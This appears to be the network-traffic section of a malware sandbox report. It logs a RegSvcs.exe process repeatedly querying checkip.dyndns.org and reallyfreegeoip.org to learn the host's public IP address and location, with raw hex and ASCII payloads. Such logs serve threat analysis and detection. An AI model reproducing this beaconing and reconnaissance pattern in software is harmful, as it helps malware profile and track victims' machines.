                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 7ea10eb22c483368f36a760eb7efd256
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.849711158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:32.267570972 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 09:41:33.471648932 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:33 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 82544f03955eb2c79718c7f2b2950adc
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.849714158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:35.255482912 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:36.461808920 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:36 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: ad9f471c236238dec879848700ae7054
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.849717158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:38.477087021 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:39.690244913 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6749ffea5d5cbf480817d6e772cde86c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.849719158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:41.472887993 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:42.676666975 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:42 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: e777e81f7ceb9fc483c6d575d52ae65b
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.849721158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:44.462203026 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:45.675975084 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:45 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: abcca6ed863fea13439073c5c93eac28
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.849723158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:47.505641937 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:48.710066080 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:48 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 793f284e303d1a10f15a509a762c8591
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.849707104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:27 UTC880INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:26 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413655
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XdQNpcpBG690rQk4VjUilw4v%2BBPOK70FPlCV%2FZsOso53Q0xJTIsfvwjvPNkBpq1zCJVjpxqSBLNg4b3AigutuE7sNqga%2FoeZJkZikmXZNxjPX56Y%2BEW08O%2BHT9h8w5qky735Z82"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d363e51425d-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1581&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1846932&cwnd=193&unsent_bytes=0&cid=4e4fc929613f3c6a&ts=460&x=0"
                                                                                                                                  2024-12-17 08:41:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.849708104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-17 08:41:29 UTC882INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:28 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413657
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aPTmtCB0o%2B%2B37Dvr2wY2ZY3wK3LpcN3qm9Qtk50or1Ran%2B8%2BsPu6LUpT33Wzq8xCY%2FpC82RkBYUySfUADaMqiY1R3v5pd6AYszqICqBsZ%2FKNq95AW7WRc234XNTB3sWV3NDQW1dJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d441c466a5f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1554&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1785932&cwnd=187&unsent_bytes=0&cid=79a8a021d18d4481&ts=450&x=0"
                                                                                                                                  2024-12-17 08:41:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.849710104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:31 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-17 08:41:32 UTC872INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:31 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413660
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouHY%2BMQsyva4RSAJWQz527FedhCXLvxBUA7TLicxN0Czf4bLrTc1yyLAjU05oK7lUAwrw7O3qLE6eS1VG5xfBPZ7G50mTaYxvBOXxhsKABwBrAGB2eau5LmvgazVauZrdlR6pCaD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d56d886c425-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1525&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1914754&cwnd=240&unsent_bytes=0&cid=5495ff281b622adb&ts=450&x=0"
                                                                                                                                  2024-12-17 08:41:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.849712104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:35 UTC878INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:34 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413663
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2pfO6wAJrzeXG0ectusGobBeVc%2FfSZfWsDMjUe37m6MrFvmAP0jZy47VO2FLJGhFws%2BE%2BjcidRMO5xZ9S2naO7rLkZ3xQGUvvUR2fWA2R8qnnSOBglwbAdHfzaQ%2BuLKN3NlEsoj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d698b174378-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1785932&cwnd=235&unsent_bytes=0&cid=d1c52dc1b53febec&ts=449&x=0"
                                                                                                                                  2024-12-17 08:41:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.849716104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:37 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-17 08:41:38 UTC870INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:37 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413666
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VLOv1LpXRDMjOdJFh65UWVTDBcb31AevLLTeTPzMLEGQgUiuS67BIBBc9P4RSNinoMBpUnFOD5jzJOlQDC8aNQcH1bwzGJ0GCCQH36MB4uUkimic2mWdkZKrERIkcEtavZHbope"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d7c3e8343f7-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1728833&cwnd=213&unsent_bytes=0&cid=1acf5ac5072b89a3&ts=463&x=0"
                                                                                                                                  2024-12-17 08:41:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.849718104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:41 UTC876INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:41 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413670
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQrZXRN1M%2BBYE6cgYoQmTEscP71Kpb7zZL1O%2FWD3Y2kEkUD1Xumt3CNieBwnSb6wqr6b3AgbrGo%2Frr6kXoeHSJVV8Ty0lqbETtUN3GTWEPRJVRMHnH4ASNwdnWGE2XKhNPYSozb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359d906e4a19c7-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1783&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1527995&cwnd=146&unsent_bytes=0&cid=f0cfc981893b6ac4&ts=449&x=0"
